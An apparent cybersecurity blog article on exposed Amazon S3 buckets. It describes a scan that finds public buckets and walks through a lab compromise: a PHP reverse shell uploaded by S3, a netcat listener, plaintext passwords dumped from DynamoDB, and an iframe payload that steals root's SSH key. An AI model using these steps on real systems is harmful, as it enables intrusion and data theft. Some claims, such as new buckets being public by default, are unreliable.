Follow us

We discover up to 8 misconfigured Amazon S3 buckets every second

How to protect your resource from being hacked through the Amazon S3 service

Published: October 14, 2021 By Sabrina Lupsan

Title image for Anti-data-leak guidance 2021. How to protect your resource from being hacked through the Amazon S3 service?

Image source ─ freepik.com

The AWS S3 cloud service now has 100 trillion objects in its storage, and Amazon claims that the objects stored there have 99.999% durability. Huge companies like Netflix, Twitch, and BBC use Amazon S3 Services to store their data on the Cloud.

According to a trusted source, it's estimated that 5.5% of the AWS S3 buckets are public. Anybody can read them due to misconfigurations. It means that approximately 5.5 trillion objects stored in the Amazon S3 cloud service are vulnerable. And in this article, I will show you how easily we can find them.

In this article, we will:

  • analyze vulnerabilities regarding the S3 buckets
  • show in detail how can hack a machine running AWS services
  • list some protection measures recommended by Amazon and us to keep your data safe on the Cloud.

Disclaimer: The attack replicated in this article was performed on a machine in a safe environment, made especially for this. Please do not attack anyone without written consent.

Most impactful Amazon S3 data breaches

Alteryx Inc exposed the data of 123 million American households

The year 2017 was an infamous year for the Amazon S3 cloud service. The computer software company revealed private information such as an address, age, phone number, mortgage, ethnicity, and others belonging to no less than 123 million American households, approximately 97,06% of the total number of households.

This data breach happened because of a misconfiguration in the bucket where the information was stored. The storage was public and therefore accessible for anyone.

40.000 plain-text passwords stored by Accenture were leaked

Four servers owned by Accenture, a company specialized in IT services and consulting, were stored in public Amazon S3 buckets. They contained around 40.000 plain-text passwords and other critical information such as credentials and access keys necessary to log into their internal API.

Among the credentials, there was also administrators' log-in information.

It is unknown if Accenture personnel was impersonated using the stolen credentials and if even more business information was stolen.

Another thing to consider is that if the employees of Accenture reuse passwords across websites and platforms, the cyberattack can extend much more and affect more than just the organization.

Verizon compromised 6 million records on public S3 servers

The giant Verizon, an American wireless network operator, stored records containing names, account PINs, addresses, mobile numbers, etc. These 6 million records were stored in a public Amazon S3 server. Some were leaked partially, while some were entirely lost.

The public S3 server was under the management of Verizon's partner, Nice Systems; a company specialized in telephone voice recording, data security, etc.

All of these data breaches happened because of unconfigured or misconfigured Amazon S3 buckets and servers. It is critical to understand how the Amazon cloud service works and what to do to prevent such substantial cybernetic disasters.

Other significant entities that fell victim to such data breaches are the U.S. Department of Defense, Time Warner Cable, and World Wrestling Entertainment (WWE).


How to find vulnerable S3 buckets

Amazon says there are 100 trillion objects stored in the S3 cloud service. It is estimated that about 5.5% of them are public and accessible to anyone.

Amazon S3 buckets can be either public or private. New buckets are, by default, public, but it didn't use to be the case in the past. If you did not take security measures to limit free access to your data, the bucket was public.

A public S3 bucket is accessible for everyone. Therefore, we can find one and download its contents. I don't know about you, but this sounds very scary to me – could anyone on the internet download my files?

Let's see how many of these buckets we can find in just a few minutes.

  1. Find an S3 bucket scraper.

I found a handy tool on GitHub named Bucket Finder. After looking at the Ruby code and reading the README.md, I concluded that it's safe to use and proceeded to download it.

git clone https://github.com/FishermansEnemy/bucket_finder.git

I then changed to the bucket_finder directory and made the ruby file executable.

cd bucket_finder
chmod +x bucket_finder.rb
  1. Find a wordlist for the Bucket Finder tool

For the tool to work, we need to provide it with a wordlist. This GitHub project does not provide an appropriate one, but I immediately found one here. I cloned this repository as well and provided the Bucket Finder the list.

git clone https://github.com/koaj/aws-s3-bucket-wordlist.git 
./bucket_finder.rb aws-s3-bucket-wordlist/list.txt > output.txt

The sequence'> output.txt' sends the output directly to a text file, which is more manageable for us.

We can take a peek into this wordlist, so we know what we're using.

head -20 list.txt 

The first 20 words in the list.txt wordlist

  1. Inspect and clean the results

Taking a peek into the 'output.txt' file, we see that some of the buckets are not public and therefore clog our results.

Some buckets deny our access

However, we can clean our results. Using the 'grep' tool, we will only select the lines that contain the characters' < public>'. And we have a lot of results in the first 100 lines in the file.

head -100 output.txt | grep '<Public>'

Public objects on the S3 buckets

After letting the script run for around 10 minutes, we have discovered a staggering number of public S3 buckets.

cat output.txt | grep '<Public>' > public_objects.txt

Now we have all of our findings in the file public_objects.txt. We will again grep the results because some URLs take more than one line (and we don't want to count a URL twice) and then count the apparitions using the command' wc -l'.

cat public_objects.txt | grep '<Public>' | wc -l

The result?

4671 public objects were found in a few minutes

4671 URLs. If we try to click on one, we are prompted to download the file or files.

However, we will not be downloading anyone's files in this situation.

Finding 4671 URLs in just a few minutes is proof that misconfiguring your S3 bucket is extremely dangerous.

Next, I will replicate an attack (in a safe environment, NOT on one of the found URLs) to show you just how damaging a vulnerable bucket can be to the owner. Its goes beyond just stealing some files and results in owning the system of the server machine.


Amazon S3 Bucket Vulnerability

I will show you how I have replicated an attack by using the file upload feature of Amazon S3.

I first installed the AWS CLI (Command Line Interface) on my Kali Linux machine with the command:

sudo apt install awscli

We install the AWS CLI using the command sudo apt install awscli

I then attempted to connect to a custom endpoint and list the files in the server:

aws –endpoint-url http://s3.bucket.htb s3 ls

We connect to an endpoint, but we first have to configure credentials

However, credentials need to be configured to connect. They can be set with the following command:

aws configure

When prompted, if you leave every field blank, it does not work. But we can use invalid keys (and input any data), and it will still work.

We issue the previous command, and it works; we are connected to the endpoint.

We can now connect to the endpoint

Now we will use the file upload feature of Amazon AWS by uploading a reverse shell that connects back to us.

A reverse shell is a command or a collection of commands that establish a connection from a remote machine to our machine. We are making the target machine connect to us by injecting a file that executes these commands.

Using Kali Linux, such reverse shells are already on your machine, in the directory /usr/share/laudanum/php. If you are on a different Linux flavor, you can download the reverse shell from PentestMonkey.

However, when using this file, you must change your IP and your port. You can find your IP by using ifconfig. I used port 443. You can see comments next to the parameters that you have to change (or you can use CTRL+F to find them fast).

We change the reverse shell with our IP and port

We then upload the file on the server by using the cp (copy) command.

aws –endpoint-url http://s3.bucket.htb s3 cp reverse_shell.php s3://adserver/rev.php

We upload the reverse shell under the name rev.php

You should get a prompt back with the upload location.

We set up the Netcat listener. The machine will connect to us on port 443, so we must use Netcat to receive the connection.

sudo nc -nlvp 443 

We turn on a netcat listener on port 443

We now browse the website to execute our shell. We type the website's URL, a '/', and the file name to find our injected file. We uploaded it under the name shell.php.

We visit the website at /shell.php to execute our injected commands

After we browse it, we check in the terminal and see that we have a shell.

Gained low privileged shell as www-data

We can now type commands on the machine hosting the server.

We are a low privilege user, which is www-data. However, this does not mean that the vulnerability cannot have a huge impact. There are many ways in which we can escalate our privileges.

Before continuing with this shell, I will show you some other commands you can perform on the AWS server that exposes a significant vulnerability.

Amazon uses DynamoDB. We can use this information to find more about the database. Using the following command, we can find the name of tables in the database.

aws --endpoint-url=http://s3.bucket.htb dynamodb describe-table --table-name use

We find the name of the table 'users'

We see that the database contains the table "users". Enumerating further, we find the users and the clear-text passwords.

aws --endpoint-url=http://s3.bucket.htb dynamodb scan --table-name users

We read the credentials from the table 'users'

Going back to our initial shell, we need to find the users of the machine. They don't need to be identical to the ones in the database (however, password re-usage can happen, so the found credentials can still be valid).

ls -la /home

We list the directories from home to find all the users

We see the user roy. To have a more stable shell and show you how to use SSH on the machine, we will connect with SSH to try all the passwords in the database. The last one works, and we are connected as roy on the machine!

We SSH as roy and test the obtained credentials

Now, to gain complete control of the system, we use the AWS server one more time.

We create the table alerts:

aws dynamodb create-table \ --table-name alerts \ --attribute-definitions \ AttributeName=title,AttributeType=S \ AttributeName=data,AttributeType=S \ --key-schema \ AttributeName=title,KeyType=HASH \ AttributeName=data,KeyType=RANGE \ --provisioned-throughput \ ReadCapacityUnits=10,WriteCapacityUnits=5 \ --endpoint-url http://s3.bucket.htb

And add a record:

aws dynamodb put-item \ --table-name alerts \ --item '{ "title": {"S": "Ransomware"}, "data": {"S": "<html><head></head><body><iframe src='/root/.ssh/id_rsa'></iframe></body></html>"} }' \ --return-consumed-capacity TOTAL \ --endpoint-url http://s3.bucket.htb

That will retrieve the root's SSH key from the directory /root/.ssh.

curl -X POST -d "action=get_alerts" http://127.0.0.1:8000

And then, we use curl to download the root's key and listen on port 8000.

curl http://127.0.0.1:8000/files/result.pdf -o ./result.pdf

We open the result.pdf and find the RSA key.

We move the key in a file called id RSA and set appropriate permissions for the file to connect with SSH.

chmod 400 id_rsa
ssh [email protected] -i id_rsa

We change the permissions on the root's key and successfully SSH into it, gaining full access to the machine

And we have gained full access to the machine using Amazon AWS S3 bucket vulnerabilities.


What is Amazon S3?

Amazon Simple Storage Service, or Amazon S3, is a service offered by Amazon Web Services (AWS) built to offer object storage on the Cloud. Amazon promises:

  • scalability
  • data availability
  • security
  • performance

A Bucket is a resource available on an AWS S3 server. It is a container, like a folder, that stores objects (which are defined by files and their metadata).

According to a trusted source, AWS's top users include huge companies like Netflix, Twitch, LinkedIn, Facebook, BBC, Adobe, Twitter, etc.

Top 10 AWS Users


Protection measures

To protect your AWS S3 bucket and disallow intruders' access to your storage space, you can use the following features provided by Amazon:

  • Block public access
  • Use Bucket ACLs (Access Control Lists) to restrict read, write, access permissions from Everyone
  • Scan your Amazon S3 buckets with the ListBuckets API
  • Implement policies that do not allow everyone to access and perform actions on the bucket (note: the wildcard "*" means everyone)
  • Encrypt your data. Amazon supports HTTPS, which encrypts data in transit

Infographic

I have prepared an infographic where you can see statistics about the Amazon S3 cloud storage platform. Please read the protection measures carefully and apply them to keep your data safe!

Infographic about Amazon AWS S3 cloud storage

Feel free to share the code of infographics


Conclusion

You have seen how many major data breaches affected huge companies and revealed millions of personal records. We effortlessly found public S3 objects in 10 minutes, just by using a free tool on GitHub.

Considering the demonstration shown in this article, you should take great care of your cloud storage and take all the security measures that Amazon & I recommend.

It's important because today, I demonstrated how the machine hosting the AWS server could be compromised, and the damage can go further to your or your company's storage.

If you use the Amazon AWS S3 services, please let me know if you have heard of any other vulnerabilities and what protection measures you take to keep your private data safe?

Author
Sabrina Lupsan
Sabrina Lupșan is a writer at CoolTechZone, a cybersecurity enthusiast, and a future penetration tester. She holds a Bachelor’s degree in Computer Science and Economics.

Write a review

click to select